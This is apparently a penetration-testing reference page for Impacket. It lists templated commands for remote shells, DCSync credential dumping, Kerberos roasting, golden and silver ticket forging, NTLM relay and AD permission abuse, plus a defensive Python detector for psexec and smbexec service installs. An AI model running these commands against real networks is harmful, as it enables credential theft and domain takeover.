Impacket

Overview

Impacket is a Python library and collection of tools for working with network protocols — SMB, MSRPC, Kerberos, LDAP, MSSQL, and more. It is the primary toolkit for AD attacks from Linux, covering remote execution, credential dumping, Kerberos abuse, and LDAP manipulation. On Kali: sudo apt install -y impacket-scripts.

ATT&CK Mapping

  • Tactics: TA0002 - Execution, TA0006 - Credential Access, TA0008 - Lateral Movement
  • Techniques: T1003.006 - DCSync, T1021.002 - SMB/Windows Admin Shares

Authentication Patterns

All Impacket tools share a common authentication syntax:

# Password
impacket-<tool> '<domain>/<user>:<password>@<target>'

# NTLM hash (pass-the-hash)
impacket-<tool> '<domain>/<user>@<target>' -hashes ':<ntlm_hash>'

# Kerberos ticket
export KRB5CCNAME=ticket.ccache
impacket-<tool> '<domain>/<user>@<target_hostname>' -k -no-pass

# AES key
impacket-<tool> '<domain>/<user>@<target>' -aesKey <aes256_key>

Tool Reference

Remote Execution

Tool               Protocol        Runs As  File Write                  Detection
impacket-psexec    SMB             SYSTEM   Writes service binary       High
impacket-smbexec   SMB             SYSTEM   No binary, uses %COMSPEC%   Medium
impacket-wmiexec   WMI (DCOM)      User     No binary                   Low
impacket-atexec    Task Scheduler  SYSTEM   No binary                   Medium
impacket-dcomexec  DCOM            User     No binary                   Low

# Impacket
# https://github.com/fortra/impacket

# Interactive shell via PsExec
impacket-psexec '<domain>/<user>:<password>@<target>'

# Semi-interactive shell via WMI
impacket-wmiexec '<domain>/<user>:<password>@<target>'

# Execute single command via task scheduler
impacket-atexec '<domain>/<user>:<password>@<target>' 'whoami'

# SMBExec (no binary upload)
impacket-smbexec '<domain>/<user>:<password>@<target>'
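The "File Write" column above is what a defender can key on. The following is an added example, not code from this page or from the Impacket project: two heuristics run over constructed Windows System-log Event ID 7045 ("a service was installed") records, flagging a service whose binary is a bare random executable under the system root (the psexec pattern) and a service whose ImagePath is a %COMSPEC% one-liner writing output to an administrative share (the smbexec pattern). The service names, image paths and the BTOBTO name are assumptions modelled on the tools' documented behaviour, not values taken from this page.

```python
import re
from typing import Dict, List, Tuple

# Constructed Event ID 7045 records (not real telemetry), shaped like what each tool leaves behind.
SAMPLE_7045: List[Dict[str, str]] = [
    {"ServiceName": "Spooler", "ImagePath": r"C:\Windows\System32\spoolsv.exe",
     "AccountName": "LocalSystem"},
    # psexec-style: short random service name, random .exe uploaded via ADMIN$ (= %SystemRoot%)
    {"ServiceName": "rJQw", "ImagePath": r"%SystemRoot%\ZxKpQmLa.exe",
     "AccountName": "LocalSystem"},
    # smbexec-style: no binary at all, ImagePath is a %COMSPEC% one-liner writing output to C$
    # (service name BTOBTO is an assumed default)
    {"ServiceName": "BTOBTO",
     "ImagePath": r"%COMSPEC% /Q /c echo whoami ^> \\127.0.0.1\C$\__output 2^>^&1 "
                  r"> %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat",
     "AccountName": "LocalSystem"},
]

# Heuristic 1: a letters-only .exe sitting directly under the system root. The 4-12 length
# window is a tuning assumption, not a rule; legitimate services rarely look like this.
RANDOM_EXE_IN_SYSROOT = re.compile(r"^%SystemRoot%\\[A-Za-z]{4,12}\.exe$", re.IGNORECASE)
# Heuristic 2: cmd.exe via %COMSPEC% with output redirected into an admin share (C$, ADMIN$, ...).
COMSPEC_TO_ADMIN_SHARE = re.compile(
    r"%COMSPEC%.*/c.*\\\\[^\\]+\\(?:[A-Za-z]|ADMIN)\$\\", re.IGNORECASE)


def classify_service_install(event: Dict[str, str]) -> str:
    """Return a verdict string for one 7045 record."""
    path = event.get("ImagePath", "")
    if COMSPEC_TO_ADMIN_SHARE.search(path):
        return "suspicious: smbexec-style %COMSPEC% service writing to an admin share"
    if RANDOM_EXE_IN_SYSROOT.match(path):
        return "suspicious: psexec-style random service binary in %SystemRoot%"
    return "benign"


def triage(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (ServiceName, verdict) for every record that is not benign."""
    hits: List[Tuple[str, str]] = []
    for ev in events:
        verdict = classify_service_install(ev)
        if verdict != "benign":
            hits.append((ev["ServiceName"], verdict))
    return hits


if __name__ == "__main__":
    for name, verdict in triage(SAMPLE_7045):
        print(f"{name}: {verdict}")
```

Note that wmiexec, atexec and dcomexec install no service, so 7045 alone does not cover them; that is why the table rates them lower.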

Credential Dumping

# DCSync — dump all domain hashes
impacket-secretsdump '<domain>/<admin>:<password>@<dc_ip>' -just-dc

# DCSync — specific user
impacket-secretsdump '<domain>/<admin>:<password>@<dc_ip>' -just-dc-user 'krbtgt'

# Dump local SAM/LSA from remote host
impacket-secretsdump '<domain>/<admin>:<password>@<target>'

# Dump from local hive files
impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL

Kerberos

# Kerberoasting
impacket-GetUserSPNs '<domain>/<user>:<password>' -dc-ip <dc_ip> -request -outputfile kerberoast.txt

# AS-REP Roasting
impacket-GetNPUsers '<domain>/' -usersfile users.txt -dc-ip <dc_ip> -format hashcat -outputfile asrep.txt

# Request TGT
impacket-getTGT '<domain>/<user>:<password>' -dc-ip <dc_ip>

# Request service ticket (S4U / delegation abuse)
impacket-getST '<domain>/<user>:<password>' -spn 'cifs/<target>' -impersonate Administrator -dc-ip <dc_ip>

# Forge Golden Ticket
impacket-ticketer -nthash <krbtgt_hash> -domain-sid <sid> -domain <domain> Administrator

# Forge Silver Ticket
impacket-ticketer -nthash <svc_hash> -domain-sid <sid> -domain <domain> -spn 'cifs/<host>' Administrator

# Convert ticket format
impacket-ticketConverter ticket.kirbi ticket.ccache

Enumeration

# SID lookup / RID brute force
impacket-lookupsid '<domain>/<user>:<password>@<dc_ip>'

# Enumerate AD users
impacket-GetADUsers '<domain>/<user>:<password>' -dc-ip <dc_ip> -all

# Find delegation relationships
impacket-findDelegation '<domain>/<user>:<password>' -dc-ip <dc_ip>

# NTLM relay to LDAP (privilege escalation with --escalate-user; use -i instead for an interactive LDAP shell)
impacket-ntlmrelayx -t ldap://<dc_ip> --no-http-server -smb2support --escalate-user <user>

ACL Manipulation

# Read DACL
impacket-dacledit '<domain>/<user>:<password>' -action read -target '<object>' -dc-ip <dc_ip>

# Grant DCSync rights
impacket-dacledit '<domain>/<user>:<password>' -action write -rights DCSync -principal '<user>' -target-dn 'DC=domain,DC=local' -dc-ip <dc_ip>

# Take ownership
impacket-owneredit '<domain>/<user>:<password>' -action write -new-owner '<user>' -target '<object>' -dc-ip <dc_ip>

Other Useful Tools

# SMB client
impacket-smbclient '<domain>/<user>:<password>@<target>'

# MSSQL client
impacket-mssqlclient '<domain>/<user>:<password>@<target>' -windows-auth

# Add computer account (for RBCD)
impacket-addcomputer '<domain>/<user>:<password>' -computer-name 'FAKE01$' -computer-pass 'Password123'

# RBCD configuration
impacket-rbcd '<domain>/<user>:<password>' -delegate-to '<target>$' -delegate-from 'FAKE01$' -action write -dc-ip <dc_ip>

# Change password
impacket-changepasswd '<domain>/<user>@<dc_ip>' -newpass '<new_password>'

References

Official Documentation

MITRE ATT&CK